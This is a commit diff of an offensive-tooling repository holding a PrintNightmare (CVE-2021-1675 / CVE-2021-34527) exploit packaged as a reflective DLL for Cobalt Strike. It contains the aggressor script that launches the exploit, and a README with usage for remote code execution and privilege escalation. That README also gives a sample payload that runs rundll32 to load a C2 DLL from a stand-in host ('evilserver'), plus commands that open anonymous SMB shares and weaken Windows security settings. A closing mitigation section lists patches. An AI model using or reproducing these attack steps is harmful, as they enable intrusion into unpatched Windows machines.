First commit

PrintNightmare/PrintNightmare.cna

@@ -0,0 +1,21 @@
+#author Cornelis de Plaa
+#@outflank.nl
+
+#Reflective Dll implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
+
+#register help
+beacon_command_register("PrintNightmare", "CVE-2021-1675 / CVE-2021-34527 exploit.",
+	"Synopsis: PrintNightmare <target ip or hostname> <UNC path to payload Dll> <optional domain> <optional username> <optional password>\n\n" .
+	"Reflective Dll implementation of the PrintNightmare (CVE-2021-1675 / CVE-2021-34527) exploit.\n");
+
+alias PrintNightmare {
+	$bid = $1;
+	$params = substr($0, 15);
+
+	if ($params eq "") {
+		berror($bid, "Specify params.");
+		return;
+	}
+
+	bdllspawn($1, script_resource("PrintNightmare.dll"), $params, "PrintNightmare", 5000, false);
+}

PrintNightmare/PrintNightmare_dll.txt

@@ -0,0 +1 @@
+We are not releasing binaries, please compile yourself.

README.md

@@ -1 +1,128 @@
-# PrintNightmare
+# PrintNightmare exploit #
+
+**CVE-2021-1675 / CVE-2021-34527** exploit.
+
+Reflective Dll implementation of the PrintNightmare PoC by Cornelis de Plaa ([@Cneelis](https://twitter.com/cneelis)). The exploit was originally created by Zhiniang Peng ([@edwardzpeng](https://twitter.com/edwardzpeng)) & Xuefeng Li ([@lxf02942370](https://twitter.com/lxf02942370)).
+
+* It can be used as Remote Code Execution (RCE) exploit (screenshot 1),
+* It can be used for Privilege Escalation (screenshot 2).
+
+This implementation has some advantages compared to other public exploits:
+
+* It uses MS-PAR protocol instead of MS-RPRN (credits [@cube0x0](https://twitter.com/cube0x0)).
+* It is in Reflective DLL form, so can be used directly from Cobaltstrike or other C2 framework.
+* It automatically finds the path of the printer driver.
+
+### Usage ###
+
+Within Cobaltstrike Beacon console:
+
+```
+PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]
+```
+
+The payload DLL is started by spoolsv.exe (print spool service) from DllMain and should thus avoid API calls which require synchronisation to avoid deadlocks.
+We recommend to let this payload DLL perform a CreateProcess call to something like this:
+
+
+```
+void NothingToSeeHere() {
+	STARTUPINFO sui;
+	PROCESS_INFORMATION pi;
+
+	RtlZeroMemory(&sui, sizeof(sui));
+	RtlZeroMemory(&pi, sizeof(pi));
+	sui.cb = sizeof(sui);
+
+	GetStartupInfo(&sui);
+	LPCWSTR lpwApplicationName = L"C:\\Windows\\System32\\rundll32.exe";
+	LPWSTR lpwCommandLine = (LPWSTR)L"C:\\Windows\\System32\\rundll32.exe \\\\evilserver\\thankyou\\c2payload.dll,MyExport";
+
+	if (!CreateProcess(lpwApplicationName, lpwCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &sui, &pi)) {
+		return;
+	}
+
+	CloseHandle(pi.hProcess);
+	CloseHandle(pi.hThread);
+
+	return;
+}
+```
+
+*Screenshot 1: using this exploit for RCE*
+![](PrintNightmare_rce.jpeg)
+
+*Screenshot 2: using this exploit for LPE*
+![](PrintNightmare_lpe.png) 
+
+*SMB server configuration*
+
+Source: https://github.com/cube0x0/CVE-2021-1675#smb-configuration
+
+Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access:
+
+```
+[global]
+     map to guest = Bad User
+     server role = standalone server
+     usershare allow guests = yes
+     idmap config * : backend = tdb
+     smb ports = 445
+[smb]
+     comment = Samba
+     path = /tmp/
+     guest ok = yes
+     read only = no
+     browsable = yes
+     force user = smbuser
+```
+
+From windows it's also possible:
+
+```
+mkdir C:\share
+icacls C:\share\ /T /grant Anonymous logon:r
+icacls C:\share\ /T /grant Everyone:r
+New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
+REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
+REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
+REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
+REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
+# Reboot
+```
+
+### Compile instructions: ###
+
+This project is written in C and assembly.
+You can use Visual Studio to compile it from source.
+We are not releasing binaries, so you will have to compile yourself.
+
+### Mitigation ###
+
+In July 2021 Microsoft released an emergency update to fix the PrintNightmare vulnerability (CVE-2021-34527).
+Make sure you run Windows update and install the following update:
+
+* Version 21H1, 20H1, 2004 – KB5004945 (Build 19043.1083).
+* Version 1909 – KB5004946 (Build 18363.1646).
+* Version 1809 and Windows Server 2019 – KB5004947 (Build 17763.2029).
+* Version 1803 – KB5004949
+* Version 1507 – KB5004950.
+* Windows 8.1 and Windows Server 2012 – KB5004954 and KB5004958 (security only).
+* Windows 7 SP1 and Windows Server 2008 R2 SP1 – KB5004953 and KB5004951 (security only)
+* Windows Server 2008 SP2 – KB5004955 and KB5004959 (security only).
+
+For more information, see Microsoft guidance:
+
+https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
+
+This patch also offers the ability to prevent non-administrators from installing any print drivers on a print server (incl. signed drivers), by configuring the “RestrictDriverInstallationToAdministrators” registry value.
+For information on this option, see:
+
+https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7
+
+Other option to mitigate the PrintNightmare vulnerability includes:
+
+* Disable Print Spooler service‍ (on Domain Controllers & non-print servers)‍.
+* Disable inbound remote printing through Group Policy.
+* Block inbound connectivity using a firewall.
+* Ensure Point and Print installation prompts are enabled.

SOURCE/PrintNightmare-rDll/PrintNightmare.sln

@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PrintNightmare", "PrintNightmare\PrintNightmare.vcxproj", "{D30C9D6B-1F45-47BD-825B-389FE8CC9069}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x64.ActiveCfg = Debug|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x64.Build.0 = Debug|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x86.ActiveCfg = Debug|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Debug|x86.Build.0 = Debug|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x64.ActiveCfg = Release|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x64.Build.0 = Release|x64
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x86.ActiveCfg = Release|Win32
+		{D30C9D6B-1F45-47BD-825B-389FE8CC9069}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

SOURCE/PrintNightmare-rDll/PrintNightmare/PrintNightmare.vcxproj

@@ -0,0 +1,134 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{D30C9D6B-1F45-47BD-825B-389FE8CC9069}</ProjectGuid>
+    <RootNamespace>Recon-AuditPol</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+    <ProjectName>PrintNightmare</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="ms-par.h" />
+    <ClInclude Include="ms-rprn.h" />
+    <ClInclude Include="ReflectiveDLLInjection.h" />
+    <ClInclude Include="ReflectiveLoader.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="ms-par.c" />
+    <ClCompile Include="ms-rprn.c" />
+    <ClCompile Include="ReflectiveDll.c" />
+    <ClCompile Include="ReflectiveLoader.c" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

SOURCE/PrintNightmare-rDll/PrintNightmare/PrintNightmare.vcxproj.filters

@@ -0,0 +1,45 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ReflectiveDLLInjection.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="ReflectiveLoader.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="ms-rprn.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="ms-par.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="ReflectiveDll.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="ReflectiveLoader.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="ms-rprn.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="ms-par.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

SOURCE/PrintNightmare-rDll/PrintNightmare/PrintNightmare.vcxproj.user

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>